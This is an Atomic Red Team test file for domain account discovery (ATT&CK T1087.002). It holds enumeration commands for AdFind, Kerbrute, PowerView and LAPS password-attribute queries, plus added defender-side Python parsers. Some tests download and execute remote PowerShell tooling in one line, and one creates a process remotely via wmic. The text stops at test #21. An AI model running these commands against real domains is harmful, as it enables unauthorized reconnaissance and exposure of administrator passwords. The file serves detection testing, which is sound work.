atomic-red-team/atomics/T1087.002/T1087.002.md
2026-02-18 16:55:45 +00:00

# T1087.002 - Account Discovery: Domain Account
## Description from ATT&CK
> Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior such as targeting specific accounts which possess particular privileges.
>
> Commands such as <code>net user /domain</code> and <code>net group /domain</code> of the [Net](https://attack.mitre.org/software/S0039) utility, <code>dscacheutil -q group</code> on macOS, and <code>ldapsearch</code> on Linux can list domain users and groups. [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets including <code>Get-ADUser</code> and <code>Get-ADGroupMember</code> may enumerate members of Active Directory groups.(Citation: CrowdStrike StellarParticle January 2022)
[Source](https://attack.mitre.org/techniques/T1087/002)
## Atomic Tests
- [Atomic Test #1: Enumerate all accounts (Domain)](#atomic-test-1-enumerate-all-accounts-domain)
- [Atomic Test #2: Enumerate all accounts via PowerShell (Domain)](#atomic-test-2-enumerate-all-accounts-via-powershell-domain)
- [Atomic Test #3: Enumerate logged on users via CMD (Domain)](#atomic-test-3-enumerate-logged-on-users-via-cmd-domain)
- [Atomic Test #4: Automated AD Recon (ADRecon)](#atomic-test-4-automated-ad-recon-adrecon)
- [Atomic Test #5: Adfind -Listing password policy](#atomic-test-5-adfind--listing-password-policy)
- [Atomic Test #6: Adfind - Enumerate Active Directory Admins](#atomic-test-6-adfind---enumerate-active-directory-admins)
- [Atomic Test #7: Adfind - Enumerate Active Directory User Objects](#atomic-test-7-adfind---enumerate-active-directory-user-objects)
- [Atomic Test #8: Adfind - Enumerate Active Directory Exchange AD Objects](#atomic-test-8-adfind---enumerate-active-directory-exchange-ad-objects)
- [Atomic Test #9: Enumerate Default Domain Admin Details (Domain)](#atomic-test-9-enumerate-default-domain-admin-details-domain)
- [Atomic Test #10: Enumerate Active Directory for Unconstrained Delegation](#atomic-test-10-enumerate-active-directory-for-unconstrained-delegation)
- [Atomic Test #11: Get-DomainUser with PowerView](#atomic-test-11-get-domainuser-with-powerview)
- [Atomic Test #12: Enumerate Active Directory Users with ADSISearcher](#atomic-test-12-enumerate-active-directory-users-with-adsisearcher)
- [Atomic Test #13: Enumerate Linked Policies In ADSISearcher Discovery](#atomic-test-13-enumerate-linked-policies-in-adsisearcher-discovery)
- [Atomic Test #14: Enumerate Root Domain linked policies Discovery](#atomic-test-14-enumerate-root-domain-linked-policies-discovery)
- [Atomic Test #15: WinPwn - generaldomaininfo](#atomic-test-15-winpwn---generaldomaininfo)
- [Atomic Test #16: Kerbrute - userenum](#atomic-test-16-kerbrute---userenum)
- [Atomic Test #17: Wevtutil - Discover NTLM Users Remote](#atomic-test-17-wevtutil---discover-ntlm-users-remote)
- [Atomic Test #18: Suspicious LAPS Attributes Query with Get-ADComputer all properties](#atomic-test-18-suspicious-laps-attributes-query-with-get-adcomputer-all-properties)
- [Atomic Test #19: Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property](#atomic-test-19-suspicious-laps-attributes-query-with-get-adcomputer-ms-mcs-admpwd-property)
- [Atomic Test #20: Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope](#atomic-test-20-suspicious-laps-attributes-query-with-get-adcomputer-all-properties-and-searchscope)
- [Atomic Test #21: Suspicious LAPS Attributes Query with adfind all properties](#atomic-test-21-suspicious-laps-attributes-query-with-adfind-all-properties)
- [Atomic Test #22: Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd](#atomic-test-22-suspicious-laps-attributes-query-with-adfind-ms-mcs-admpwd)
- [Atomic Test #23: Active Directory Domain Search](#atomic-test-23-active-directory-domain-search)
- [Atomic Test #24: Account Enumeration with LDAPDomainDump](#atomic-test-24-account-enumeration-with-ldapdomaindump)
### Atomic Test #1: Enumerate all accounts (Domain)
Enumerate all accounts.
Upon execution, multiple enumeration commands will be run and their output displayed in the PowerShell session.
**Supported Platforms:** Windows
**auto_generated_guid:** `6fbc9e68-5ad7-444a-bd11-8bf3136c477e`
#### Attack Commands: Run with `command_prompt`!
```cmd
net user /domain
net group /domain
```
### Atomic Test #2: Enumerate all accounts via PowerShell (Domain)
Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** `8b8a6449-be98-4f42-afd2-dedddc7453b2`
#### Attack Commands: Run with `powershell`!
```powershell
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
```
### Atomic Test #3: Enumerate logged on users via CMD (Domain)
Enumerate logged on users. Upon execution, logged on users will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** `161dcd85-d014-4f5e-900c-d3eaae82a0f7`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| computer_name | Name of remote system to query | string | %COMPUTERNAME%|
#### Attack Commands: Run with `command_prompt`!
```cmd
query user /SERVER:#{computer_name}
```
### Atomic Test #4: Automated AD Recon (ADRecon)
ADRecon extracts and combines information about an AD environment into a report. Upon execution, an Excel file with all of the data will be generated and its path will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** `95018438-454a-468c-a0fa-59c800149b59`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| adrecon_path | Path of ADRecon.ps1 file | path | PathToAtomicsFolder\..\ExternalPayloads\ADRecon.ps1|
#### Attack Commands: Run with `powershell`!
```powershell
Invoke-Expression "#{adrecon_path}"
```
#### Cleanup Commands
```powershell
Get-ChildItem "PathToAtomicsFolder\..\ExternalPayloads" -Recurse -Force | Where{$_.Name -Match "^ADRecon-Report-"} | Remove-Item -Force -Recurse
```
#### Dependencies: Run with `powershell`!
##### Description: ADRecon must exist on disk at specified location (#{adrecon_path})
###### Check Prereq Commands
```powershell
if (Test-Path "#{adrecon_path}") {exit 0} else {exit 1}
```
###### Get Prereq Commands
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -Uri "https://raw.githubusercontent.com/sense-of-security/ADRecon/38e4abae3e26d0fa87281c1d0c65cabd4d3c6ebd/ADRecon.ps1" -OutFile "#{adrecon_path}"
```
### Atomic Test #5: Adfind -Listing password policy
The AdFind tool can be used for reconnaissance in an Active Directory environment. The example chosen illustrates AdFind used to query the local password policy.
References: http://www.joeware.net/freetools/tools/adfind/, https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx
**Supported Platforms:** Windows
**auto_generated_guid:** `736b4f53-f400-4c22-855d-1a6b5a551600`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| optional_args | Allows defining arguments to add to the adfind command to tailor it to the specific needs of the environment. Use "-arg" notation to add arguments separated by spaces. | string | |
#### Attack Commands: Run with `command_prompt`!
```cmd
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
```
#### Dependencies: Run with `powershell`!
##### Description: AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
###### Check Prereq Commands
```powershell
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
```
###### Get Prereq Commands
```powershell
New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"
```
### Atomic Test #6: Adfind - Enumerate Active Directory Admins
The AdFind tool can be used for reconnaissance in an Active Directory environment. This example has been documented by ransomware actors enumerating Active Directory admin accounts.
References: http://www.joeware.net/freetools/tools/adfind/, https://stealthbits.com/blog/fun-with-active-directorys-admincount-attribute/
**Supported Platforms:** Windows
**auto_generated_guid:** `b95fd967-4e62-4109-b48d-265edfd28c3a`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| optional_args | Allows defining arguments to add to the adfind command to tailor it to the specific needs of the environment. Use "-arg" notation to add arguments separated by spaces. | string | |
#### Attack Commands: Run with `command_prompt`!
```cmd
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
```
#### Dependencies: Run with `powershell`!
##### Description: AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
###### Check Prereq Commands
```powershell
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
```
###### Get Prereq Commands
```powershell
New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"
```
### Atomic Test #7: Adfind - Enumerate Active Directory User Objects
The AdFind tool can be used for reconnaissance in an Active Directory environment. This example has been documented by ransomware actors enumerating Active Directory user objects.
References: http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
**Supported Platforms:** Windows
**auto_generated_guid:** `e1ec8d20-509a-4b9a-b820-06c9b2da8eb7`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| optional_args | Allows defining arguments to add to the adfind command to tailor it to the specific needs of the environment. Use "-arg" notation to add arguments separated by spaces. | string | |
#### Attack Commands: Run with `command_prompt`!
```cmd
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
```
#### Dependencies: Run with `powershell`!
##### Description: AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
###### Check Prereq Commands
```powershell
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
```
###### Get Prereq Commands
```powershell
New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"
```
### Atomic Test #8: Adfind - Enumerate Active Directory Exchange AD Objects
The AdFind tool can be used for reconnaissance in an Active Directory environment. This example has been documented by ransomware actors enumerating Active Directory Exchange objects.
References: http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
**Supported Platforms:** Windows
**auto_generated_guid:** `5e2938fb-f919-47b6-8b29-2f6a1f718e99`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| optional_args | Allows defining arguments to add to the adfind command to tailor it to the specific needs of the environment. Use "-arg" notation to add arguments separated by spaces. | string | |
#### Attack Commands: Run with `command_prompt`!
```cmd
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
```
#### Dependencies: Run with `powershell`!
##### Description: AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
###### Check Prereq Commands
```powershell
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
```
###### Get Prereq Commands
```powershell
New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"
```
### Atomic Test #9: Enumerate Default Domain Admin Details (Domain)
This test will enumerate the details of the built-in domain admin account
**Supported Platforms:** Windows
**auto_generated_guid:** `c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef`
#### Attack Commands: Run with `command_prompt`!
```cmd
net user administrator /domain
```
### Atomic Test #10: Enumerate Active Directory for Unconstrained Delegation
Attackers may attempt to query for computer objects with the UserAccountControl property 'TRUSTED_FOR_DELEGATION' (0x80000; 524288) set.
More Information - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#when-the-stars-align-unconstrained-delegation-leads-to-rce
Prerequisite: the AD RSAT PowerShell module is needed and the test must run under a domain user.
**Supported Platforms:** Windows
**auto_generated_guid:** `46f8dbe9-22a5-4770-8513-66119c5be63b`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| domain | Domain FQDN | string | $env:UserDnsDomain|
| uac_prop | UAC Property to search | integer | 524288|
#### Attack Commands: Run with `powershell`!
```powershell
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
```
#### Dependencies: Run with `powershell`!
##### Description: PowerShell ActiveDirectory Module must be installed
###### Check Prereq Commands
```powershell
Try {
Import-Module ActiveDirectory -ErrorAction Stop | Out-Null
exit 0
}
Catch {
exit 1
}
```
###### Get Prereq Commands
```powershell
if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) {
Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online
} else {
Install-WindowsFeature RSAT-AD-PowerShell
}
```
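The filter in this test relies on the LDAP bitwise-AND matching rule `1.2.840.113556.1.4.803`, which matches an entry only when every bit of the supplied mask is set in the attribute. The block below is an added example, not part of Atomic Red Team: it decodes `userAccountControl` flag values, reproduces that matching rule in Python, and turns it into a defender's audit that lists objects trusted for unconstrained delegation while excluding domain controllers (which carry `TRUSTED_FOR_DELEGATION` by design). The flag constants are Microsoft's documented values; the directory entries are constructed sample data rather than output from a real domain.

```python
# Added example (not part of Atomic Red Team): decode userAccountControl flags and
# reproduce the LDAP bitwise-AND matching rule used in the Get-ADObject filter above,
# so a defender can audit which objects are trusted for unconstrained delegation.
# The directory entries at the bottom are constructed sample data.

# userAccountControl bit values as documented by Microsoft (subset).
UAC_FLAGS = {
    "ACCOUNTDISABLE": 0x0002,
    "PASSWD_NOTREQD": 0x0020,
    "NORMAL_ACCOUNT": 0x0200,
    "WORKSTATION_TRUST_ACCOUNT": 0x1000,
    "SERVER_TRUST_ACCOUNT": 0x2000,        # set on domain controllers
    "DONT_EXPIRE_PASSWORD": 0x10000,
    "TRUSTED_FOR_DELEGATION": 0x80000,     # unconstrained delegation (524288)
    "NOT_DELEGATED": 0x100000,
    "DONT_REQ_PREAUTH": 0x400000,
    "TRUSTED_TO_AUTH_FOR_DELEGATION": 0x1000000,  # constrained delegation, protocol transition
}


def decode_uac(value):
    """Return the names of the known flags set in a userAccountControl value, in bit order."""
    return [name for name, bit in UAC_FLAGS.items() if value & bit]


def ldap_bit_and(entries, attribute, mask):
    """Emulate the LDAP_MATCHING_RULE_BIT_AND filter (attribute:1.2.840.113556.1.4.803:=mask):
    an entry matches only when every bit of mask is set in the attribute value."""
    return [e for e in entries if (e.get(attribute, 0) & mask) == mask]


def unconstrained_delegation_audit(entries):
    """sAMAccountNames of objects trusted for unconstrained delegation that are not domain
    controllers. DCs legitimately carry TRUSTED_FOR_DELEGATION, so they are left off the
    review list instead of being reported as findings."""
    hits = ldap_bit_and(entries, "userAccountControl", UAC_FLAGS["TRUSTED_FOR_DELEGATION"])
    return [
        e["sAMAccountName"]
        for e in hits
        if not e["userAccountControl"] & UAC_FLAGS["SERVER_TRUST_ACCOUNT"]
    ]


# Constructed sample entries (not from a real domain).
SAMPLE_ENTRIES = [
    {"sAMAccountName": "DC01$", "userAccountControl": 0x82000},      # DC: expected
    {"sAMAccountName": "WEB01$", "userAccountControl": 0x81000},     # member server: needs review
    {"sAMAccountName": "WS02$", "userAccountControl": 0x1000},       # plain workstation
    {"sAMAccountName": "svc_sql", "userAccountControl": 0x1010200},  # user with constrained delegation
]

if __name__ == "__main__":
    for entry in SAMPLE_ENTRIES:
        print(entry["sAMAccountName"], decode_uac(entry["userAccountControl"]))
    print("review:", unconstrained_delegation_audit(SAMPLE_ENTRIES))
```

The same helper evaluates any multi-bit mask the way the directory does: a mask of `0x81000` matches only objects that are both workstation trust accounts and trusted for delegation, not objects carrying just one of the two bits.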
### Atomic Test #11: Get-DomainUser with PowerView
Utilizing PowerView, run Get-DomainUser to identify the domain users. Upon execution, Users within the domain will be listed.
**Supported Platforms:** Windows
**auto_generated_guid:** `93662494-5ed7-4454-a04c-8c8372808ac2`
#### Attack Commands: Run with `powershell`!
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
```
### Atomic Test #12: Enumerate Active Directory Users with ADSISearcher
The following Atomic test will utilize ADSISearcher to enumerate users within Active Directory.
Upon successful execution, a listing of users will be output with their paths in AD.
Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
**Supported Platforms:** Windows
**auto_generated_guid:** `02e8be5a-3065-4e54-8cc8-a14d138834d3`
#### Attack Commands: Run with `powershell`!
```powershell
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
```
### Atomic Test #13: Enumerate Linked Policies In ADSISearcher Discovery
The following Atomic test will utilize ADSISearcher to enumerate organizational units within Active Directory.
Upon successful execution, a listing of users will be output with their paths in AD.
Reference: https://medium.com/@pentesttas/discover-hidden-gpo-s-on-active-directory-using-ps-adsi-a284b6814c81
**Supported Platforms:** Windows
**auto_generated_guid:** `7ab0205a-34e4-4a44-9b04-e1541d1a57be`
#### Attack Commands: Run with `powershell`!
```powershell
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
```
### Atomic Test #14: Enumerate Root Domain linked policies Discovery
The following Atomic test will utilize ADSISearcher to enumerate the root domain within Active Directory.
Upon successful execution, a listing of users will be output with their paths in AD.
Reference: https://medium.com/@pentesttas/discover-hidden-gpo-s-on-active-directory-using-ps-adsi-a284b6814c81
**Supported Platforms:** Windows
**auto_generated_guid:** `00c652e2-0750-4ca6-82ff-0204684a6fe4`
#### Attack Commands: Run with `powershell`!
```powershell
(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
```
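Tests #13 and #14 both take the `gPLink` attribute apart with `-replace "[[;]" -split "]"`. The attribute stores each link as `[LDAP://<GPO DN>;<options>]` with the options value carrying two bits (1 = link disabled, 2 = enforced). The block below is an added example, not part of Atomic Red Team: a Python parser for that format plus an audit that reports links whose GPO is missing from a known-GPO inventory, which is the defender's side of the "hidden GPO" discovery the referenced article describes. The two default-policy GUIDs are the well-known values every domain has; the sample containers and the other GUIDs are constructed.

```python
# Added example (not part of Atomic Red Team): parse the gPLink attribute that the two
# ADSISearcher one-liners above split by hand, and flag links to GPOs absent from an
# inventory. Sample containers and non-default GUIDs are constructed.
import re

# Each link is stored as [LDAP://<GPO distinguished name>;<options>]:
# options bit 1 = link disabled, bit 2 = enforced (no override).
GPLINK_RE = re.compile(r"\[(?P<path>LDAP://[^;\]]+);(?P<options>\d+)\]", re.IGNORECASE)
GUID_RE = re.compile(r"^cn=\{([0-9A-Fa-f-]{36})\}", re.IGNORECASE)

# Well-known default GPO GUIDs present in every domain.
DEFAULT_DOMAIN_POLICY = "31B2F340-016D-11D2-945F-00C04FB984F9"
DEFAULT_DC_POLICY = "6AC1786C-016F-11D2-945F-00C04FB984F9"


def parse_gplink(gplink):
    """Split a gPLink value into dicts of dn/guid/disabled/enforced, in stored order."""
    links = []
    for m in GPLINK_RE.finditer(gplink or ""):
        dn = m.group("path")[len("LDAP://"):]
        options = int(m.group("options"))
        guid_match = GUID_RE.match(dn)
        links.append({
            "dn": dn,
            "guid": guid_match.group(1).upper() if guid_match else None,
            "disabled": bool(options & 1),
            "enforced": bool(options & 2),
        })
    return links


def unknown_links(containers, known_guids):
    """(container dn, GPO guid) pairs whose linked GPO is not in the inventory of known GUIDs.
    A link to a GPO the management tooling does not list deserves a closer look."""
    known = {g.upper() for g in known_guids}
    findings = []
    for container in containers:
        for link in parse_gplink(container.get("gPLink", "")):
            if link["guid"] not in known:
                findings.append((container["dn"], link["guid"]))
    return findings


# Constructed sample containers (domain root, two OUs).
SAMPLE_CONTAINERS = [
    {"dn": "DC=example,DC=test",
     "gPLink": "[LDAP://cn={31B2F340-016D-11D2-945F-00C04FB984F9},cn=policies,cn=system,DC=example,DC=test;0]"},
    {"dn": "OU=Servers,DC=example,DC=test",
     "gPLink": "[LDAP://cn={A1B2C3D4-0000-4000-8000-000000000001},cn=policies,cn=system,DC=example,DC=test;2]"
               "[LDAP://cn={A1B2C3D4-0000-4000-8000-000000000002},cn=policies,cn=system,DC=example,DC=test;1]"},
    {"dn": "OU=Workstations,DC=example,DC=test", "gPLink": ""},
]

if __name__ == "__main__":
    for container in SAMPLE_CONTAINERS:
        print(container["dn"], parse_gplink(container["gPLink"]))
    print("unknown:", unknown_links(SAMPLE_CONTAINERS, [DEFAULT_DOMAIN_POLICY, DEFAULT_DC_POLICY]))
```

Feed `unknown_links` the GUIDs your GPO inventory actually knows about (for instance the output of a GPO listing exported from your management tooling) and the containers with their raw `gPLink` strings; an empty `gPLink`, as on the Workstations OU here, simply yields no links.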
### Atomic Test #15: WinPwn - generaldomaininfo
Gathers general domain information using the generaldomaininfo function of WinPwn
**Supported Platforms:** Windows
**auto_generated_guid:** `ce483c35-c74b-45a7-a670-631d1e69db3d`
#### Attack Commands: Run with `powershell`!
```powershell
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput
```
### Atomic Test #16: Kerbrute - userenum
Enumerates Active Directory usernames using the userenum function of Kerbrute.
**Supported Platforms:** Windows
**auto_generated_guid:** `f450461c-18d1-4452-9f0d-2c42c3f08624`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| Domain | Domain that is being tested against | string | $env:USERDOMAIN|
| DomainController | Domain Controller that is being tested against | string | $env:UserDnsDomain|
#### Attack Commands: Run with `powershell`!
```powershell
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
```
#### Dependencies: Run with `powershell`!
##### Description: kerbrute.exe must exist in PathToAtomicsFolder\..\ExternalPayloads.
###### Check Prereq Commands
```powershell
if (test-path "PathToAtomicsFolder\..\ExternalPayloads\kerbrute.exe"){exit 0} else {exit 1}
```
###### Get Prereq Commands
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
invoke-webrequest "https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_windows_386.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\kerbrute.exe"
```
##### Description: username text file must exist in PathToAtomicsFolder\..\ExternalPayloads.
###### Check Prereq Commands
```powershell
if (test-path "PathToAtomicsFolder\..\ExternalPayloads\username.txt"){exit 0} else {exit 1}
```
###### Get Prereq Commands
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/src/username.txt?raw=true" -outfile "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
```
### Atomic Test #17: Wevtutil - Discover NTLM Users Remote
This test discovers users who have authenticated against a Domain Controller via NTLM.
This is done remotely via wmic; it captures event ID 4776 from the domain controller and stores the output in C:\temp. [Reference](https://www.reliaquest.com/blog/socgholish-fakeupdates/)
**Supported Platforms:** Windows
**auto_generated_guid:** `b8a563d4-a836-4993-a74e-0a19b8481bfe`
#### Attack Commands: Run with `powershell`!
```powershell
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
```
#### Cleanup Commands
```powershell
Remove-Item -Path \\$IpAddress\c$\ntlmusers.evtx
```
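Event ID 4776 ("The computer attempted to validate the credentials for an account") is the same record a defender queries when inventorying NTLM use before restricting it, so it helps to know its fields. The block below is an added example, not part of Atomic Red Team: it parses the 4776 message body (Authentication Package, Logon Account, Source Workstation, Error Code) and summarises which accounts validated over NTLM from which hosts and where failures cluster. The NTSTATUS codes are the documented ones; the event messages are constructed in the standard 4776 layout, not real log data.

```python
# Added example (not part of Atomic Red Team): parse Event ID 4776 messages, the records
# the exported ntlmusers.evtx above would contain, and summarise NTLM use per account and
# per source workstation. The sample messages are constructed, not real log data.
import re
from collections import defaultdict

FIELD_RE = re.compile(
    r"^(Authentication Package|Logon Account|Source Workstation|Error Code):\s*(.*)$",
    re.MULTILINE,
)

# NTSTATUS values reported in the Error Code field of 4776.
NTLM_STATUS = {
    "0x0": "success",
    "0xC0000064": "user name does not exist",
    "0xC000006A": "wrong password",
    "0xC0000072": "account disabled",
    "0xC0000234": "account locked out",
}


def parse_4776(message):
    """Pull account, source workstation and a readable status out of one 4776 message."""
    fields = {key: value.strip() for key, value in FIELD_RE.findall(message)}
    return {
        "account": fields.get("Logon Account", ""),
        "workstation": fields.get("Source Workstation", ""),
        "status": NTLM_STATUS.get(fields.get("Error Code", ""), "other failure"),
    }


def summarize_ntlm(messages):
    """Map each account that validated successfully to the sorted workstations it came from,
    and count failed validations per source workstation (a burst there stands out)."""
    successes = defaultdict(set)
    failures = defaultdict(int)
    for message in messages:
        event = parse_4776(message)
        if event["status"] == "success":
            successes[event["account"]].add(event["workstation"])
        else:
            failures[event["workstation"]] += 1
    return {
        "successes": {acct: sorted(hosts) for acct, hosts in successes.items()},
        "failures": dict(failures),
    }


def _event(account, workstation, code):
    """Build a constructed 4776 message in the layout the Security log uses."""
    return (
        "The computer attempted to validate the credentials for an account.\n\n"
        "Authentication Package:\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\n"
        f"Logon Account:\t{account}\n"
        f"Source Workstation:\t{workstation}\n"
        f"Error Code:\t{code}\n"
    )


# Constructed sample events.
SAMPLE_4776 = [
    _event("jdoe", "WS02", "0x0"),
    _event("jdoe", "WS07", "0x0"),
    _event("svc_backup", "SRV01", "0x0"),
    _event("jdoe", "WS09", "0xC000006A"),
    _event("nosuchuser", "WS09", "0xC0000064"),
]

if __name__ == "__main__":
    print(summarize_ntlm(SAMPLE_4776))
```

To run it over real data, export the Security log to text (for example with `wevtutil qe Security /q:"Event[System[(EventID=4776)]]" /f:text`, splitting on the blank line between records) and pass each record's message to `summarize_ntlm`; the field names match what the Security log renders.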
### Atomic Test #18: Suspicious LAPS Attributes Query with Get-ADComputer all properties
This test executes an LDAP query using the PowerShell command Get-ADComputer and lists all the properties, including the Microsoft LAPS attributes ms-Mcs-AdmPwd and ms-Mcs-AdmPwdExpirationTime.
**Supported Platforms:** Windows
**auto_generated_guid:** `394012d9-2164-4d4f-b9e5-acf30ba933fe`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| hostname | Name of the host | string | $env:computername|
#### Attack Commands: Run with `powershell`!
```powershell
Get-ADComputer #{hostname} -Properties *
```
### Atomic Test #19: Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property
This test executes an LDAP query using the PowerShell command Get-ADComputer and lists the Microsoft LAPS attributes ms-Mcs-AdmPwd and ms-Mcs-AdmPwdExpirationTime.
**Supported Platforms:** Windows
**auto_generated_guid:** `6e85bdf9-7bc4-4259-ac0f-f0cb39964443`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| hostname | Name of the host | string | $env:computername|
#### Attack Commands: Run with `powershell`!
```powershell
Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
```
### Atomic Test #20: Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope
This test executes an LDAP query using the PowerShell command Get-ADComputer with SearchScope set to subtree and lists all the properties, including the Microsoft LAPS attributes ms-Mcs-AdmPwd and ms-Mcs-AdmPwdExpirationTime.
**Supported Platforms:** Windows
**auto_generated_guid:** `ffbcfd62-15d6-4989-a21a-80bfc8e58bb5`
#### Attack Commands: Run with `powershell`!
```powershell
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
```
### Atomic Test #21: Suspicious LAPS Attributes Query with adfind all properties
